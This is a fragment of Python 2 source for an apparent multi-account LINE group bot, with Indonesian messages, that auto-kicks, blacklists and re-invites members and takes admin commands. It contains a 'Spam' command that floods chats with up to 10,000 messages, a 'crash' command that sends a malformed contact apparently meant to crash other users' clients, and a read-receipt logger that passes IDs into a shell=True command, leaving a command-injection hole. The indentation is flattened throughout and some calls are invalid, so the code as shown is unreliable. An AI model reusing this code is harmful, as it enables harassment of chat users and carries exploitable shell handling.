G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = cl.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
cl.updateGroup(G)
except:
pass
if op.param2 in Bots:  # assumption: the original referenced an undefined name 'ken'; the bot list appears intended
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel😛")
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Dmid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Dmid:
if op.param2 in mid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Amid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Bmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
                    if op.param2 in Bots or op.param2 in owner:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
                    if op.param2 in Bots or op.param2 in owner:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
                    if op.param2 in Bots or op.param2 in owner:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
                    if op.param2 in Bots or op.param2 in owner:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
                    if op.param2 in Bots or op.param2 in owner:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
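        # op.type 19 fires when someone is kicked from a group: op.param2 is the kicker and
        # op.param3 the kicked member. With wait["AutoKick"] enabled the block below, broadly,
        # kicks the kicker back with a random KAC account, re-invites the victim and adds the
        # kicker to wait["blacklist"]; bot accounts are exempted from the kick-back.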
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
X = cl.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
G = ki.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
G = kk.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
ks.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
X = kc.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
G = ks.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
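        # Second op.type 19 pass: if one of the admins is the kicked member, a random KAC client
        # kicks the kicker back and re-invites the admin; if the main bot (mid) itself was
        # kicked, clients from the DEF list handle the recovery and the kicker is blacklisted.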
if op.type == 19:
            if op.param3 in admin: #Admin got kicked
if op.param2 in admin:
pass
                elif op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if mid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(DEF).getGroup(op.param1)
random.choice(DEF).inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
random.choice(DEF).getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------
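        # op.type 22 and 24 appear to be room (multi-user chat) events; with wait["leaveRoom"]
        # enabled the bot simply leaves the room. The op.type 26 block right after handles an
        # incoming message and auto-likes shared Timeline posts (contentType 16).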
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","mimin"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
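        # "Undang" flow: once an admin has switched wait["winvite"] on, the next shared contact
        # (contentType 13) is taken as the person to invite. The loop below skips the invite if
        # a member with the same display name is already in the group or the mid is blacklisted,
        # otherwise it adds the contact and invites them, falling back to the ki client if the
        # main client fails.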
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
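            # "Admin add @name" / "Admin remove @name" (owner only): the target is matched by
            # exact display name against the current group's members and then appended to or
            # removed from the in-memory admin list; nothing here persists that list, so it is
            # reset whenever the script restarts.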
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
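            # "Bot Add @name" (owner only): every bot account adds the member matched by display
            # name as a friend via findAndAddContactsByMid.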
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
            #-------------=SC AllBio=---------------- Change the bio of every bot. Format => Allbio: <any text you like> :D
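            # "Allbio:<text>" (owner only): pushes the same status message to all five bot
            # profiles; each update is skipped when the text is longer than 500 characters.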
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
                if msg.from_ in admin or msg.from_ in owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "c33b66e4b7709e54a6fe6eced6e57c157',"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Cv2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy buka qr","Luffy open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro buka qr","Zorro open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji open qr","Sanji buka qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
